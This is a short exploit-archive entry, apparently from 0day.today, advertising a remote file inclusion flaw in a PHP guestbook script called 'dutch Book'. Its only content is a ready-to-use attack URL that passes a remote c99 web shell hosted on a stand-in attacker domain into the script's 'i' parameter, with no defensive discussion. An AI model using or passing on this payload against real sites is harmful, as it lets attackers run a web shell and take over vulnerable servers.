id: 12445
date: 05/29/2010
title: dutch Book php - Remote file inclusion
author: Poltergeisth4cker
cves: 

======================================
dutch Book php - Remote file inclusion
======================================


dutch Book php - Remote file inclusion
 
       
Author: Poltergeisth4cker
Team: Inj3ct0r Team  (inj3ct0r.com)
Contact: Poltergeisth4cker@hotmail.com
---------------------------------------

Exploit RFI: 


>> Http://victim.nl/boek.php?i=[Http://evil.com/c99.txt?




#  0day.today [2023-03-23]  #